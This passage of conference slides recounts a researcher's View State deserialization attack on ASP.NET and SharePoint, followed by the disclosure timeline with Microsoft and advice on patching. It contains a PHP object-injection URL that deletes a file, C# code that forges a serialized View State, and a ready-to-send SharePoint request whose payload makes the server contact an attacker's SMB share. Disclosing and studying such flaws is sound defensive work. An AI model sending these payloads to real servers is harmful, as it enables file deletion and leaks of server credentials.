  • 22. “Serialization” tales Flaw can be exploited with the following link •http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10: "cache_file";s:15:"../../index.php";} When receiving this request, the server •Takes GET parameter “data” and “unserialize” it •Casts it to object type “Example1” •Assigns value “../../index.php” to property “cache_file” •When the page lifetime is over, method “__destruct()” of object “Example1” is called which deletes the file Can the same be done with .NET? 22
  • 23. 23
  • 24. “Serialization” tales Great research of James Forshaw (Context) Studying (and exploiting) .NET serialization via •IFormatter •XML Serialization •WCF Data Contracts •JSON But not a word about serialization of •View State field •LosFormatter object (limited object serialization) 24
  • 25. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object TempFileCollection deletes files in destructor [Serializable] public class TempFileCollection { private Hashtable files; // Deserialized list of files // Other stuff... ~TempFileCollection() { foreach (string file in files.Keys) { File.Delete(file); // Makes sure to delete them when // The object is destroyed! } } } 25
  • 26. “Serialization” tales Awesomeness of James Forshaw’s research •Standard .NET object FileInfo triggers SMB requests [Serializable] public class FileInfo { private string FullPath; protected FileInfo(SerializationInfo info, StreamingContext context) { // Ensures path is canonical FullPath = NormalizePath(info.GetString("FullPath")); } } string NormalizePath(string path) { string[] parts = path.Split(''); foreach(string part in parts) { currPath += "" + part; if(part[0] == '~') { // If potential short path, GetLongPathName(currPath); } // call Windows API } } 26
  • 27. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 27
  • 28. When the stories come together – My tale What if I can combine the fact I now have •A View State field without integrity protection (resp. MAC) •Known .NET objects having interesting (de)serialization actions If possible, I would be able to e.g. •Delete a file on the server •Get the server to initiate a SMB request to e.g. the attacker’s machine Can I apply it? Can it be done within the few hours left onsite? 28
  • 29. When the stories come together – My tale using System; using System.IO; using System.Text; using System.Web.UI; // created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 public class ExploitViewstate { // Caution: both files must be the same length! static String bugusFile = @"ATTACKER~testtext.txt"; static String dummyFile = @"c:testCompasstestVS.txt"; public static void Main(string[] args) { String validViewstate = GenerateValidViewstate(); Console.WriteLine("Valid viewstate: {0}", validViewstate); } private static String GenerateValidViewstate() { FileInfo fi = new FileInfo(dummyFile); LosFormatter los = new LosFormatter(); using (StringWriter sw = new StringWriter()) { los.Serialize(sw, fi); return sw.ToString(); } } } 29
  • 30. When the stories come together – My tale C:>set csc=c:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe C:>%csc% exploitViewstate.cs && exploitViewstate.exe Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= For the PoC, we need to change the file in the above Base64 string from •c:testCompasstestVS.txt to •ATTACKER~testtext.txt 30
  • 31. When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 31
  • 32. When the stories come together – My tale On an unpatched SharePoint, just send the following request: •http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&_ _VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 32
  • 33. When the stories come together – My tale In the SharePoint logs: 09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAA AAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) […] 09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5- 6190-481e-8b21-c2cb5d04222b 33
  • 34. When the stories come together – My tale Demo! When the View State MAC is disabled, you can •Delete a file on the server (via object TempFileCollection) •Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) •I wasn’t able to get a generic remote code execution (so far) –Highly dependent on the application / content of the server’s GAC –But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 34
  • 35. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 35
  • 36. Time sequence of the (patch) battle Disclosure milestones •26.09.2012 Initial contact with MSRC •19.02.2013 Microsoft aims for a fix in SharePoint in May •28.02.2013 Microsoft confirms work is under way for SkyDrive •15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC •03.07.2013 Patch again postponed (issues found during tests) •16.08.2013 Detailed answer about the next steps; BlueHat invitation •10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 36
  • 37. Time sequence of the (patch) battle Disclosure milestones (continued) •06.11.2013 Conference call with Microsoft •10.12.2013 December’s patch Tuesday with –MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) –MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) –KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) •11.12.2013 Meeting with several Microsoft people in Seattle 37
  • 38. Time sequence of the (patch) battle Disclosure milestones (continued) •05.05.2014 Release of ASP.NET 4.5.2 which forbids disabling the View State MAC •13.05.2014 May’s patch Tuesday with MS14-024 (SharePoint) •07.08.2014 Announcement that only the latest (ASP).NET framework will be supported in 2016 onward •09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 You are now safe… … if you install all suggested WU patches 38
  • 39. Time sequence of the (patch) battle But what was the content of •MS13-100 / CVE-2013-5059 •MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) Microsoft did their homework •A cross-product/company wide effort was made to address serialisation / View State issues •Several additional attack vectors were found and fixed 39
  • 40. Time sequence of the (patch) battle Extract of MS13-100 (CVE-2013-5059) •New namespace “Microsoft.Office.Server.Security” •New internal class SafeSerialization with methods »IsSafeBinaryFormatterStreamWithAllowList([…]) […] »IsSafeBinaryFormatterStreamCommon( […]) •Usage within SharePoint: 40
  • 41. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 41
  • 42. Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 42
  • 43. Is the ugly bug really dead? Yes if you patch adequately •No pages in SharePoint should be vulnerable •No pages in Outlook Web Access should be vulnerable •Disabling the Viewstate MAC should not be possible anymore with patch KB 2905247 installed This patch securing the Viewstate is controversial •“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” But how is the MAC computed? •Using the keys defined in <machineKey /> 43
  • 44. Is the ugly bug really dead? Result of an audit searching for static machineKey entries 44
  • 45. Is the ugly bug really dead? If I have your machineKey… •… I can generate a valid View State MAC too •Well, I can also generate a Forms Authentication cookie among other things… Issue was formally reported to Microsoft in August 2013 •Microsoft took contact with the affected projects How do you manage your machineKeys? 45
  • 46. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 46
  • 47. The (happy?) end Ensure your products are patched / unaffected •SharePoint (MS13-067 & MS13-100) •Exchange (OWA – MS13-0105) •ASP.NET (KB2905247) •All your other third party ASP.NET sites If you don’t use ASP.NET 4.5.2 yet •Plan to support this version as Microsoft will drop support for elderly version in 2016 47
  • 48. The (happy?) end Verify your ASP.NET applications •Don’t deserialize untrusted documents (e.g. on file uploads) •Don’t re-implement custom Viewstate-like features Ensure you manage your machineKeys correctly •If static keys are defined, manage them as carefully as all the other crypto-stuff •No copy/paste from Internet, dedicated keys per environment, … •Encrypt the sensitive sections of your web.config 48
  • 50. Merci/Thank you! Contact: alexandre.herzog@csnc.ch Blog http://blog.csnc.ch/ LinkedIn http://ch.linkedin.com/in/alexandreherzog/ G+ https://plus.google.com/u/1/109572456864701444940/ Slides: http://slideshare.net/ASF-WS/presentations http://appsec-forum.ch 50
  • 51. References Understanding ASP.NET View State http://msdn.microsoft.com/en-us/library/ms972976.aspx Beware of Serialized GUI Objects Bearing Data https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC- 2010-Byrne-SGUI-slides.pdf OWASP - PHP Object Injection https://www.owasp.org/index.php/PHP_Object_Injection Are you my Type? https://media.blackhat.com/bh-us- 12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45) http://vimeo.com/108438465 Moving to the .NET Framework 4.5.2 http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net- framework-4-5-2.aspx Farewell, EnableViewStateMac! http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell- enableviewstatemac.aspx 51